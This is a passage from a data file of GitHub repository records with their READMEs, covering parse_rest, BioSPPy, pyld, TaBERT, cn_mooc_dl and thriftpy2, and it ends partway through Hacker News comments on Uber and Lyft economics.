through the Push object:\n\n~~~~~ {python}\nfrom parse_rest.installation import Push\n\nPush.message(\"The Giants won against the Mets 2-3.\",\n channels=[\"Giants\", \"Mets\"])\n~~~~~\n\nThis will push a message to all users subscribed to the \"Giants\" and \"Mets\" channels. Your alert can be restricted based on [Advanced Targeting](http://docs.parseplatform.org/rest/guide/#sending-pushes-to-queries) by specifying the `where` argument:\n\n~~~~~ {python}\nPush.message(\"Willie Hayes injured by own pop fly.\",\n channels=[\"Giants\"], where={\"injuryReports\": True})\n\nPush.message(\"Giants scored against the A's! It's now 2-2.\",\n channels=[\"Giants\"], where={\"scores\": True})\n~~~~~\n\nIf you wish to include more than a simple message in your notification, such as incrementing the app badge in iOS or adding a title in Android, use the `alert` method and pass the actions in a dictionary:\n\n~~~~~ {python}\nPush.alert({\"alert\": \"The Mets scored! The game is now tied 1-1.\",\n \"badge\": \"Increment\", \"title\": \"Mets Score\"}, channels=[\"Mets\"],\n where={\"scores\": True})\n~~~~~\n\n\nCloud Functions\n---------------\n\nParse offers [CloudCode](http://docs.parseplatform.org/rest/guide/#cloud-code), which has the ability to upload JavaScript functions that will be run on the server. You can use the `parse_rest` client to call those functions.\n\nThe CloudCode guide describes how to upload a function to the server. Let's say you upload the following `main.js` script:\n\n~~~~~ {javascript}\nParse.Cloud.define(\"hello\", function(request, response) {\n response.success(\"Hello world!\");\n});\n\n\nParse.Cloud.define(\"averageStars\", function(request, response) {\n var query = new Parse.Query(\"Review\");\n query.equalTo(\"movie\", request.params.movie);\n query.find({\n success: function(results) {\n var sum = 0;\n for (var i = 0; i < results.length; ++i) {\n sum += results[i].get(\"stars\");\n }\n response.success(sum / results.length);\n },\n error: function() {\n response.error(\"movie lookup failed\");\n }\n });\n});\n~~~~~\n\nThen you can call either of these functions using the `parse_rest.datatypes.Function` class:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Function\n\nhello_func = Function(\"hello\")\nhello_func()\n{u'result': u'Hello world!'}\nstar_func = Function(\"averageStars\")\nstar_func(movie=\"The Matrix\")\n{u'result': 4.5}\n~~~~~\n\n\nACLs\n---------------\nThe ACL for an object can be updated using the `parse_rest.datatypes.ACL` class. This class provides three methods for setting an ACL: set_user, set_role, and set_default. For example, using the User and gameScore examples from above:\n~~~~~ {python}\nfrom parse_rest.datatypes import ACL\nfrom parse_rest.user import User\n\nu = User.login('dhelmet', '12345')\n\ngameScore.ACL.set_user(u, read=True, write=True)\n# allows user 'dhelmet' to read and write to gameScore\ngameScore.ACL.set_default(read=True)\n# allows public to read but not write to gameScore\ngameScore.ACL.set_role('moderators', read=True, write=True)\n# allows role 'moderators' to read and write to gameScore. Can alternatively pass the role object instead of the\n# role name. See below for more info on Roles.\ngameScore.save()\n~~~~~\n\n\nRoles\n---------------\nYou can create, update or delete roles as well, using the `parse_rest.role.Role` class. Creating a role requires you to pass a name and an ACL to Role.\n~~~~~ {python}\nfrom parse_rest.role import Role\nfrom parse_rest.datatypes import ACL\n\nadmin_role = Role(name='moderators')\nadmin_role.ACL.set_default(read=True)\nadmin_role.save()\n~~~~~\n\nThis, for example, creates a role with the name 'moderators', with an ACL that allows the public to read but not write to this role object.\n\n\nSession Tokens\n---------------\nWhen querying or updating an object protected by an ACL, parse.com requires the session token of the user with read and write privileges, respectively. You can pass the session token to such queries and updates by using the `parse_rest.connection.SessionToken` class.\n\n~~~~~ {python}\nfrom parse_rest.connection import SessionToken\nfrom parse_rest.user import User\n\nu = User.login('dhelmet', '12345')\ntoken = u.sessionToken\n\nwith SessionToken(token):\n collectedItem = CollectedItem.Query.get(type=\"Sword\") # Get a collected item, Sword, that is protected by ACL\n print collectedItem\n \nu.logout()\n~~~~~\n\nAssuming the CollectedItem 'Sword' is read-protected from the public by an ACL and is readable only by the user, SessionToken allows the user to bypass the ACL and get the 'Sword' item.\n\nElevating Access to Master\n--------------------------\nSometimes it is useful to only allow privileged use of the master key for specific uses.\n\n~~~~~ {python}\nfrom parse_rest.connection import MasterKey\n\nwith MasterKey('master key'):\n # do privileged calls\n~~~~~\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PIA-Group/BioSPPy", "link": "https://github.com/PIA-Group/BioSPPy", "tags": ["python", "physiological-computing", "biosignals", "data-science", "signal-processing"], "stars": 516, "description": "Biosignal Processing in Python", "lang": "Python", "repo_lang": "", "readme": "> This repository is archived. The BioSPPy toolbox is now maintained at [scientisst/BioSPPy](https://github.com/scientisst/BioSPPy).\n\n# BioSPPy - Biosignal Processing in Python\n\n*A toolbox for biosignal processing written in Python.*\n\n[![Image](https://github.com/PIA-Group/BioSPPy/raw/master/docs/logo/logo_400.png \"I know you're listening! - xkcd.com/525\")](http://biosppy.readthedocs.org/)\n\nThe toolbox bundles together various signal processing and pattern recognition\nmethods geared towards the analysis of biosignals.\n\nHighlights:\n\n- Support for various biosignals: BVP, ECG, EDA, EEG, EMG, PCG, PPG, Respiration\n- Signal analysis primitives: filtering, frequency analysis\n- Clustering\n- Biometrics\n\nDocumentation can be found at: \n\n## Installation\n\nInstallation can be easily done with `pip`:\n\n```bash\n$ pip install biosppy\n```\n\n## Simple Example\n\nThe code below loads an ECG signal from the `examples` folder, filters it,\nperforms R-peak detection, and computes the instantaneous heart rate.\n\n```python\nfrom biosppy import storage\nfrom biosppy.signals import ecg\n\n# load raw ECG signal\nsignal, mdata = storage.load_txt('./examples/ecg.txt')\n\n# process it and plot\nout = ecg.ecg(signal=signal, sampling_rate=1000., show=True)\n```\n\nThis should produce a plot similar to the one below.\n\n[![Image](https://github.com/PIA-Group/BioSPPy/raw/master/docs/images/ECG_summary.png \"ECG Summary Plot\")]()\n\n## Dependencies\n\n- bidict\n- h5py\n- matplotlib\n- numpy\n- scikit-learn\n- scipy\n- shortuuid\n- six\n- joblib\n\n## Citing\nPlease use the following if you need to cite BioSPPy:\n\n- Carreiras C, Alves AP, Louren\u00e7o A, Canento F, Silva H, Fred A, *et al.*\n **BioSPPy - Biosignal Processing in Python**, 2015-,\n https://github.com/PIA-Group/BioSPPy/ [Online; accessed ```--```].\n\n```latex\n@Misc{,\n author = {Carlos Carreiras and Ana Priscila Alves and Andr\\'{e} Louren\\c{c}o and Filipe Canento and Hugo Silva and Ana Fred and others},\n title = {{BioSPPy}: Biosignal Processing in {Python}},\n year = {2015--},\n url = \"https://github.com/PIA-Group/BioSPPy/\",\n note = {[Online; accessed ]}\n}\n```\n\n## License\n\nBioSPPy is released under the BSD 3-clause license. See LICENSE for more details.\n\n## Disclaimer\n\nThis program is distributed in the hope it will be useful and provided\nto you \"as is\", but WITHOUT ANY WARRANTY, without even the implied\nwarranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This\nprogram is NOT intended for medical diagnosis. We expressly disclaim any\nliability whatsoever for any direct, indirect, consequential, incidental\nor special damages, including, without limitation, lost revenues, lost\nprofits, losses resulting from business interruption or loss of data,\nregardless of the form of action or legal theory under which the\nliability may be asserted, even if advised of the possibility of such\ndamages.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalbazaar/pyld", "link": "https://github.com/digitalbazaar/pyld", "tags": ["json-ld", "semantic-web", "linked-data", "rdf", "python"], "stars": 516, "description": "JSON-LD processor written in Python", "lang": "Python", "repo_lang": "", "readme": "README.rst", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/TaBERT", "link": "https://github.com/facebookresearch/TaBERT", "tags": [], "stars": 515, "description": "This repository contains source code for the TaBERT model, a pre-trained language model for learning joint representations of natural language utterances and (semi-)structured tables for semantic parsing. TaBERT is pre-trained on a massive corpus of 26M Web tables and their associated natural language context, and could be used as a drop-in replacement of a semantic parsers original encoder to compute representations for utterances and table schemas (columns).", "lang": "Python", "repo_lang": "", "readme": "# TaBERT: Learning Contextual Representations for Natural Language Utterances and Structured Tables\n\nThis repository contains source code for the [`TaBERT` model](https://arxiv.org/abs/2005.08314), a pre-trained language model for learning joint representations of natural language utterances and (semi-)structured tables for semantic parsing. `TaBERT` is pre-trained on a massive corpus of 26M Web tables and their associated natural language context, and could be used as a drop-in replacement of a semantic parsers original encoder to compute representations for utterances and table schemas (columns).\n\n## Installation\n\nFirst, install the conda environment `tabert` with supporting libraries.\n\n```bash\nbash scripts/setup_env.sh\n```\n\nOnce the conda environment is created, install `TaBERT` using the following command:\n\n```bash\nconda activate tabert\npip install --editable .\n```\n\n**Integration with HuggingFace's pytorch-transformers Library** is still WIP. While all the pre-trained models were developed based on the old version of the library `pytorch-pretrained-bert`, they are compatible with the the latest version `transformers`. The conda environment will install both versions of the transformers library, and `TaBERT` will use `pytorch-pretrained-bert` by default. You could uninstall the `pytorch-pretrained-bert` library if you prefer using `TaBERT` with the latest version of `transformers`.\n\n## Pre-trained Models\n\nPre-trained models could be downloaded from this [Google Drive shared folder](https://drive.google.com/drive/folders/1fDW9rLssgDAv19OMcFGgFJ5iyd9p7flg?usp=sharing).\nPlease uncompress the tarball files before usage.\n\nPre-trained models could be downloaded from command line as follows:\n```shell script\npip install gdown\n\n# TaBERT_Base_(k=1)\ngdown 'https://drive.google.com/uc?id=1-pdtksj9RzC4yEqdrJQaZu4-dIEXZbM9'\n\n# TaBERT_Base_(K=3)\ngdown 'https://drive.google.com/uc?id=1NPxbGhwJF1uU9EC18YFsEZYE-IQR7ZLj'\n\n# TaBERT_Large_(k=1)\ngdown 'https://drive.google.com/uc?id=1eLJFUWnrJRo6QpROYWKXlbSOjRDDZ3yZ'\n\n# TaBERT_Large_(K=3)\ngdown 'https://drive.google.com/uc?id=17NTNIqxqYexAzaH_TgEfK42-KmjIRC-g'\n```\n\n## Using a Pre-trained Model\n\nTo load a pre-trained model from a checkpoint file:\n\n```python\nfrom table_bert import TableBertModel\n\nmodel = TableBertModel.from_pretrained(\n 'path/to/pretrained/model/checkpoint.bin',\n)\n```\n\nTo produce representations of natural language text and and its associated table:\n```python\nfrom table_bert import Table, Column\n\ntable = Table(\n id='List of countries by GDP (PPP)',\n header=[\n Column('Nation', 'text', sample_value='United States'),\n Column('Gross Domestic Product', 'real', sample_value='21,439,453')\n ],\n data=[\n ['United States', '21,439,453'],\n ['China', '27,308,857'],\n ['European Union', '22,774,165'],\n ]\n).tokenize(model.tokenizer)\n\n# To visualize table in an IPython notebook:\n# display(table.to_data_frame(), detokenize=True)\n\ncontext = 'show me countries ranked by GDP'\n\n# model takes batched, tokenized inputs\ncontext_encoding, column_encoding, info_dict = model.encode(\n contexts=[model.tokenizer.tokenize(context)],\n tables=[table]\n)\n```\n\nFor the returned tuple, `context_encoding` and `column_encoding` are PyTorch tensors \nrepresenting utterances and table columns, respectively. `info_dict` contains useful \nmeta information (e.g., context/table masks, the original input tensors to BERT) for \ndownstream application.\n\n```python\ncontext_encoding.shape\n>>> torch.Size([1, 7, 768])\n\ncolumn_encoding.shape\n>>> torch.Size([1, 2, 768])\n```\n\n**Use Vanilla BERT** To initialize a TaBERT model from the parameters of BERT:\n\n```python\nfrom table_bert import TableBertModel\n\nmodel = TableBertModel.from_pretrained('bert-base-uncased')\n```\n\n## Example Applications\n\nTaBERT could be used as a general-purpose representation learning layer for semantic parsing tasks over database tables. \nExample applications could be found under the `examples` folder.\n\n## Extract/Preprocess Table Corpora from CommonCrawl and Wikipedia\n\n### Prerequisite\n\nThe following libraries are used for data extraction:\n\n* [`jnius`](https://pyjnius.readthedocs.io/en/stable/)\n* [`info.bliki.wiki`](https://bitbucket.org/axelclk/info.bliki.wiki/wiki/Mediawiki2HTML)\n* wikitextparser\n* Beautiful Soup 4\n* Java Wikipedia code located at `contrib/wiki_extractor`\n * It compiles to a `.jar` file using maven, which is also included in the folder\n* `jdk` 12+\n\n### Installation\nFist, you need to install Java JDK. \nThen use the following command to install necessary Python libraries. \n\n```\npip install -r preprocess/requirements.txt\npython -m spacy download en_core_web_sm\n```\n\n### Training Table Corpora Extraction\n\n#### CommonCrawl WDC Web Table Corpus 2015\n\nDetails of the dataset could be found at [here](http://webdatacommons.org/webtables/2015/downloadInstructions.html).\nWe used the English relational tables split, which could be downloaded at [here](http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/englishCorpus/compressed/).\n\nThe script to preprocess the data is at `scripts/preprocess_commoncrawl_tables.sh`.\nThe following command pre-processes [a sample](http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/sample.gz) \nof the whole WDC dataset. To preprocess the whole dataset, simply replace \nthe `input_file` with the root folder of the downloaded tar ball files.\n```shell script\nmkdir -p data/datasets\nwget http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/sample.gz -P data/datasets\ngzip -d < data/datasets/sample.gz > data/datasets/commoncrawl.sample.jsonl\n\npython \\\n -m preprocess.common_crawl \\\n --worker_num 12 \\\n --input_file data/datasets/commoncrawl.sample.jsonl \\\n --output_file data/preprocessed_data/common_crawl.preprocessed.jsonl\n```\n\n#### Wikipedia Tables\n\nThe script to extract Wiki tables is at `scripts/extract_wiki_tables.sh`. It demonstrates\nextracting tables from a sampled Wikipedia dump. Again, you may need the full Wikipedida dump\nto perform data extraction.\n\n### Notes for Table Extraction\n\n**Extract Tables from Scraped HTML Pages** \nMost code in `preprocess.extract_wiki_data` is for extracting surrounding \nnatural language sentences around tables. If you are only interested in \nextracting tables (e.g., from scraped Wiki Web pages), you could just use \nthe `extract_table_from_html` function. See the comments for more details. \n\n## Training Data Generation\n\nThis section documents how to generate training data for masked language modeling training \nfrom extracted and preprocessed tables. \n\nThe scripts to generate training data for our vanilla `TaBERT(K=1)` and vertical attention\n`TaBERT(k=3)` models are `utils/generate_vanilla_tabert_training_data.py` and \n`utils/generate_vertical_tabert_training_data.py`. They are heavily optimized for generating \ndata in parallel in a distributed compute environment, but could still be used locally. \n\nThe following script assumes you have concatenated\nthe `.jsonl` files obtained from running the data extraction scripts on Wikipedia and CommonCrawl\ncorpora and saved to `data/preprocessed_data/tables.jsonl`\n\n```shell script\ncd data/preprocessed_data\ncat common_crawl.preprocessed.jsonl wiki_tables.jsonl > tables.jsonl\n```\n\nThe following script generates training data for a vanilla `TaBERT(K=1)` model:\n```shell script\noutput_dir=data/train_data/vanilla_tabert\nmkdir -p ${output_dir}\n\npython -m utils.generate_vanilla_tabert_training_data \\\n --output_dir ${output_dir} \\\n --train_corpus data/preprocessed_data/tables.jsonl \\\n --base_model_name bert-base-uncased \\\n --do_lower_case \\\n --epochs_to_generate 15 \\\n --max_context_len 128 \\\n --table_mask_strategy column \\\n --context_sample_strategy concate_and_enumerate \\\n --masked_column_prob 0.2 \\\n --masked_context_prob 0.15 \\\n --max_predictions_per_seq 200 \\\n --cell_input_template 'column|type|value' \\\n --column_delimiter \"[SEP]\"\n```\n\nThe following script generates training data for a `TaBERT(K=3)` model with \nvertical self-attention:\n```shell script\noutput_dir=data/train_data/vertical_tabert\nmkdir -p ${output_dir}\n\npython -m utils.generate_vertical_tabert_training_data \\\n --output_dir ${output_dir} \\\n --train_corpus data/preprocessed_data/tables.jsonl \\\n --base_model_name bert-base-uncased \\\n --do_lower_case \\\n --epochs_to_generate 15 \\\n --max_context_len 128 \\\n --table_mask_strategy column \\\n --context_sample_strategy concate_and_enumerate \\\n --masked_column_prob 0.2 \\\n --masked_context_prob 0.15 \\\n --max_predictions_per_seq 200 \\\n --cell_input_template 'column|type|value' \\\n --column_delimiter \"[SEP]\"\n```\n\n**Parallel Data Generation** The script has two additional arguments, `--global_rank` and \n`--world_size`. To generate training data in parallel using `N` processes, just fire up \n`N` processes with the same set of arguments and `--world_size=N`. The argument `--global_rank` \nis set to `[1, 2, ..., N]` for each process.\n\n## Model Training\nOur models are trained on a cluster of 32GB Tesla V100 GPUs. The following script demonstrates \ntraining a vanilla `TaBERT(k=1)` model using a single GPU with gradient accumulation:\n```shell script\nmkdir -p data/runs/vanilla_tabert\n\npython train.py \\\n --task vanilla \\\n --data-dir data/train_data/vanilla_tabert \\\n --output-dir data/runs/vanilla_tabert \\\n --table-bert-extra-config '{}' \\\n --train-batch-size 8 \\\n --gradient-accumulation-steps 32 \\\n --learning-rate 2e-5 \\\n --max-epoch 10 \\\n --adam-eps 1e-08 \\\n --weight-decay 0.0 \\\n --fp16 \\\n --clip-norm 1.0 \\\n --empty-cache-freq 128\n```\n\nThe following script shows training a `TaBERT(k=3)` model with vertical self-attention:\n```shell script\nmkdir -p data/runs/vertical_tabert\n\npython train.py \\\n --task vertical_attention \\\n --data-dir data/train_data/vertical_tabert \\\n --output-dir data/runs/vertical_tabert \\\n --table-bert-extra-config '{\"base_model_name\": \"bert-base-uncased\", \"num_vertical_attention_heads\": 6, \"num_vertical_layers\": 3, \"predict_cell_tokens\": true}' \\\n --train-batch-size 8 \\\n --gradient-accumulation-steps 64 \\\n --learning-rate 4e-5 \\\n --max-epoch 10 \\\n --adam-eps 1e-08 \\\n --weight-decay 0.01 \\\n --fp16 \\\n --clip-norm 1.0 \\\n --empty-cache-freq 128\n```\n\nDistributed training with multiple GPUs is similar to [XLM](https://github.com/facebookresearch/XLM).\n\n## Reference\n\nIf you plan to use `TaBERT` in your project, please consider citing [our paper](https://arxiv.org/abs/2005.08314):\n```\n@inproceedings{yin20acl,\n title = {Ta{BERT}: Pretraining for Joint Understanding of Textual and Tabular Data},\n author = {Pengcheng Yin and Graham Neubig and Wen-tau Yih and Sebastian Riedel},\n booktitle = {Annual Conference of the Association for Computational Linguistics (ACL)},\n month = {July},\n year = {2020}\n}\n```\n\n## License\n\nTaBERT is CC-BY-NC 4.0 licensed as of now.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "renever/cn_mooc_dl", "link": "https://github.com/renever/cn_mooc_dl", "tags": [], "stars": 515, "description": "\u4e2d\u56fd\u5927\u5b66MOOC\uff0c\u5b66\u5802\u5728\u7ebf\uff0c\u7f51\u6613\u4e91\u8bfe\u5802\uff0c\u4e0b\u8f7d", "lang": "Python", "repo_lang": "", "readme": "cn_mooc_dl\n==========\n\n1. \u4e2d\u56fd\u5927\u5b66 MOOC\uff08`icourse163.org`\uff09\u89c6\u9891\u4e0b\u8f7d\n2. \u6e05\u534e\u5b66\u5802\u5728\u7ebf\uff08`xuetangx.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n3. \u7f51\u6613\u4e91\u8bfe\u5802\uff08`study.163.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n4. \u7f51\u6613\u4e91\u8bfe\u5802\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\uff08`mooc.study.163.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n\n####\u6d4b\u8bd5\u73af\u5883\uff1a `PYTHON 2.7\uff1b WIN 7`\n####\u4f9d\u8d56\u5305\uff1a `requests\uff0c beautifulsoup4`\n\tpip install requests\n\tpip install beautifulsoup4\n\u6216\u8005\u5728\u4ee3\u7801\u76ee\u5f55\u4e0b\n\t\n\tpip install -r requirements.txt \n\n\n####\u4e2d\u56fd\u5927\u5b66 MOOC\uff08`icourse163.org`\uff09\uff1a\n python icourse163_dl.py -u -p \"url\"\n\n* \u5176\u4e2d url \u662f\u6253\u5f00\u8bfe\u7a0b\u9875\u9762\u540e\uff0c\u6d4f\u89c8\u5668\u5730\u5740\u680f\u2018#\u2019\u4e4b\u524d\u90e8\u5206\u3002\n\u4ee5\u201c\u56fd\u9632\u79d1\u5927\u9ad8\u7b49\u6570\u5b66\uff08\u4e00\uff09\u201d\u4e3a\u4f8b\uff0c\u6253\u5f00\u8bfe\u7a0b\u540e\u6d4f\u89c8\u5668\u5730\u5740\u680f\u663e\u793a\u4e3a\uff1a\n`http://www.icourse163.org/learn/nudt-9004#/learn/announce`\n\u5219 url \u4e3a `http://www.icourse163.org/learn/nudt-9004`\n* \u7f51\u6613\u6d41\u91cf\u65f6\u5feb\u65f6\u6162\uff0c\u65f6\u6709\u65f6\u65e0\u3002\u53ef\u4ee5\u8fd0\u884c\u4e24\u904d\uff0c\u4e4b\u524d\u6ca1\u4e0b\u5b8c\u7684\u53ef\u65ad\u7ebf\u7eed\u4f20\u3002\n\n####\u6e05\u534e\u5b66\u5802\u5728\u7ebf\uff08`xuetangx.com`\uff09\uff1a \n python xuetangx_dl.py -u -p \"url\"\n \n* \u5176\u4e2d url \u662f\u8bfe\u7a0b\u8bfe\u4ef6\u9875\u9762\u7684\u6d4f\u89c8\u5668\u5730\u5740\uff0c\u6bd4\u5982\uff1a\n`http://www.xuetangx.com/courses/HITx/GO90300700/2014_T2/courseware/`\n\n####\u7f51\u6613\u4e91\u8bfe\u5802\uff08`study.163.com`\uff09\uff1a\n python study163_dl.py \"url\"\n* \u4e91\u8bfe\u5802\u65b0\u589e\u4e13\u680f\u201c\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\u201d\u90a3\u4e00\u90e8\u5206\uff08mooc.study.163.com\uff09\u6709\u70b9\u7279\u6b8a\uff0c\u5177\u4f53\u770b\u4e0b\u9762\u3002\n* \u6536\u8d39\u8bfe\u7a0b\u4e0b\u4e0d\u4e86\u3002\n* \u7f51\u6613\u4e91\u8bfe\u5802\u4e0d\u5fc5\u767b\u5f55\u3002\u5176\u4e2d url \u662f\u8bfe\u7a0b\u5217\u8868\u9875\u9762\u6d4f\u89c8\u5668\u5730\u5740\uff0c\u6bd4\u5982:\n`http://study.163.com/course/introduction/334013.htm`\n* \u4e0d\u80fd\u7eed\u4f20\u3002\n\n \n####\u4e91\u8bfe\u5802\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\uff08`mooc.study.163.com`\uff09\uff1a \n python icourse163_dl.py -u -p \"url\" \n* \u4e91\u8bfe\u5802\u65b0\u589e\u4e13\u680f\u201c\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\u201d\uff0c\u867d\u7136\u6302\u5728\u4e91\u8bfe\u5802\u9875\u9762\u4e0a\uff0c\u4f46\u662f\u91cc\u9762\u7684\u7ed3\u6784\u662f\u548c\u201c\u4e2d\u56fd\u5927\u5b66 MOOC\u201d\u4e00\u6837\u7684\u3002\u6240\u4ee5\u8981\u7528 `icourse163_dl.py` \u6765\u4e0b\u8f7d\u3002\n* \u5176\u4e2d url \u7c7b\u4f3c\u8fd9\u6837\uff1a `http://mooc.study.163.com/learn/ZJU-1000002014`\n\n\n#####--path \u7528\u4e8e\u6307\u5b9a\u4fdd\u5b58\u6587\u4ef6\u5939\uff0c --overwrite \u6307\u5b9a\u662f\u5426\u8986\u76d6\n\n\nmatthieu.lin@gmail.com", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Thriftpy/thriftpy2", "link": "https://github.com/Thriftpy/thriftpy2", "tags": ["thrift", "thriftpy", "python", "rpc"], "stars": 515, "description": "Pure python approach of Apache Thrift. ", "lang": "Python", "repo_lang": "", "readme": "============\nThriftPy2\n============\n\n.. image:: https://travis-ci.com/Thriftpy/thriftpy2.svg?branch=develop\n :target: https://travis-ci.com/Thriftpy/thriftpy2\n\n.. image:: https://img.shields.io/codecov/c/github/Thriftpy/thriftpy2.svg\n :target: https://codecov.io/gh/Thriftpy/thriftpy2\n\n.. image:: https://img.shields.io/pypi/dm/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/v/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/pyversions/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n.. image:: https://img.shields.io/pypi/implementation/thriftpy2.svg\n :target: https://pypi.org/project/thriftpy2/\n\n\nThriftPy: https://github.com/eleme/thriftpy has been deprecated, ThriftPy2 aims to provide long term support.\n\n\nMigrate from Thriftpy?\n======================\n\nAll you need is:\n\n.. code:: python\n\n import thriftpy2 as thriftpy\n\n\nThat's it! thriftpy2 is fully compatible with thriftpy.\n\n\nInstallation\n============\n\nInstall with pip.\n\n.. code:: bash\n\n $ pip install thriftpy2\n\nYou may also install cython first to build cython extension locally.\n\n.. code:: bash\n\n $ pip install cython thriftpy2\n\n\nCode Demo\n=========\n\nThriftPy make it super easy to write server/client code with thrift. Let's\ncheckout this simple pingpong service demo.\n\nWe need a 'pingpong.thrift' file:\n\n::\n\n service PingPong {\n string ping(),\n }\n\nThen we can make a server:\n\n.. code:: python\n\n import thriftpy2\n pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")\n\n from thriftpy2.rpc import make_server\n\n class Dispatcher(object):\n def ping(self):\n return \"pong\"\n\n server = make_server(pingpong_thrift.PingPong, Dispatcher(), '127.0.0.1', 6000)\n server.serve()\n\nAnd a client:\n\n.. code:: python\n\n import thriftpy2\n pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")\n\n from thriftpy2.rpc import make_client\n\n client = make_client(pingpong_thrift.PingPong, '127.0.0.1', 6000)\n print(client.ping())\n\nAnd it also supports asyncio on Python 3.5 or later:\n\n.. code:: python\n\n import thriftpy2\n import asyncio\n from thriftpy2.rpc import make_aio_client\n\n\n echo_thrift = thriftpy2.load(\"echo.thrift\", module_name=\"echo_thrift\")\n\n\n async def request():\n client = await make_aio_client(\n echo_thrift.EchoService, '127.0.0.1', 6000)\n print(await client.echo('hello, world'))\n client.close()\n\n.. code:: python\n\n import asyncio\n import thriftpy2\n\n from thriftpy2.rpc import make_aio_server\n\n echo_thrift = thriftpy2.load(\"echo.thrift\", module_name=\"echo_thrift\")\n\n\n class Dispatcher(object):\n async def echo(self, param):\n print(param)\n await asyncio.sleep(0.1)\n return param\n\n\n def main():\n server = make_aio_server(\n echo_thrift.EchoService, Dispatcher(), '127.0.0.1', 6000)\n server.serve()\n\n\n if __name__ == '__main__':\n main()\n\nSee, it's that easy!\n\nYou can refer to 'examples' and 'tests' directory in source code for more\nusage examples.\n\n\nFeatures\n========\n\nCurrently ThriftPy have these features (also advantages over the upstream\npython lib):\n\n- Supports Python 2.7, Python 3.4+, PyPy and PyPy3.\n\n- Pure python implementation. No longer need to compile & install the 'thrift'\n package. All you need is thriftpy2 and thrift file.\n\n- Compatible with Apache Thrift. You can use ThriftPy together with the\n official implementation servers and clients, such as a upstream server with\n a thriftpy2 client or the opposite.\n\n Currently implemented protocols and transports:\n\n * binary protocol (python and cython)\n\n * compact protocol (python and cython)\n\n * json protocol\n\n * Apache JSON protocol compatible with apache thrift distribution's JSON protocol.\n Simply do ``from thriftpy2.protocol import TApacheJSONProtocolFactory`` and pass\n this to the ``proto_factory`` argument where appropriate.\n\n * buffered transport (python & cython)\n\n * framed transport\n\n * tornado server and client (with tornado 4.0)\n\n * http server and client\n\n * asyncio support (python 3.5 or later)\n\n- Can directly load thrift file as module, the sdk code will be generated on\n the fly.\n\n For example, ``pingpong_thrift = thriftpy2.load(\"pingpong.thrift\", module_name=\"pingpong_thrift\")``\n will load 'pingpong.thrift' as 'pingpong_thrift' module.\n\n Or, when import hook enabled by ``thriftpy2.install_import_hook()``, you can\n directly use ``import pingpong_thrift`` to import the 'pingpong.thrift' file\n as module, you may also use ``from pingpong_thrift import PingService`` to\n import specific object from the thrift module.\n\n- Easy RPC server/client setup.\n\n\n\nContribute\n==========\n\n1. Fork the repo and make changes.\n\n2. Write a test which shows a bug was fixed or the feature works as expected.\n\n3. Make sure ``travis-ci`` or ``tox`` tests succeed.\n\n4. Send pull request.\n\n\nContributors\n============\n\nhttps://github.com/Thriftpy/thriftpy2/graphs/contributors\n\n\nSponsors:\n============\n\n.. image:: ./docs/jetbrains.svg\n :target: https://www.jetbrains.com/?from=ThriftPy\n\n\nChangelog\n=========\n\nhttps://github.com/Thriftpy/thriftpy2/blob/master/CHANGES.rst\n", "readme_type": "rst", "hn_comments": "Shocker! A product is more popular that is sold below cost and you actually need to charge more for a product than it costs to produce?In third world countries like India, Uber and Lyft cannot compete with it\u2019s street smart drives. Drivers call you and ask you to cancel the trip and pay them in cash to take you to the destination. They use Uber/Lyft marketing, tracking, and status but give zero dollars in revenue back.I think we're about to see a lot of tech ideas with questionable economics come back to earth. When the cost of capital was below a single digit, \"parking\" money in a growth bet could vaguely make sense. After all, someday Uber would figure it out, or get AVs, or .. something? Better than leaving the money in a .01% money market for 10 years, or parking the money in something with no path for growth like industrials.This problem isn't restricted to startups however, even big tech has big expensive forays into questionable markets. Meta is building something for a few billion a year, Google has hundreds of strange an unprofitable businesses, and B2B SaaS is full of startups which may actually just be consultancies.A 10-12% cost of capital means that you either need to have a real plan to turn profit in 3 years or investors won't care. Just breaking even means an opportunity cost of 30%.Let's not forget that this kind of venture also destroys the business it was meant to disrupt, at least while the venture money is flowing.Uncreative distruction.Somehow it seems wrong that people can make enough money to buy an island without actually making money.Totally unsurprising and still both unprofitable businesses (Lyft, and Uber) 3 years after IPO. [0][0] https://news.ycombinator.com/item?id=21328967My favorite feature of Uber and Lyft the last several years is that it's essentially a crowdsourced way to transfer wealth from VCs to random users.Operating every drive at a loss means the rider and drivers benefit and the person holding the bag is some VC who apparently has more money than they know what to do with. Given how many financial structures today seem to flow in the opposite direction and skim a little money from everyone to transfer it to the already-rich, it's nice seeing a system that (completely unintentionally) flows the other way.The P2P transportation market is an ideal one for a workers' cooperative. The fact that Uber and Lyft are running at a loss (...for now) does not make them any less rent-seeking in their business model.https://drivers.coop/https://ridefair.io/I would like to read an explanation for how Uber and Lyft can't be profitable when taxicab companies can be.The broker model has a yes out in the transportation industry, before Uber and Lyft were a twinkle in someones eye. It's a low margin business and has gained efficiency through tech. Once we understand that the gross 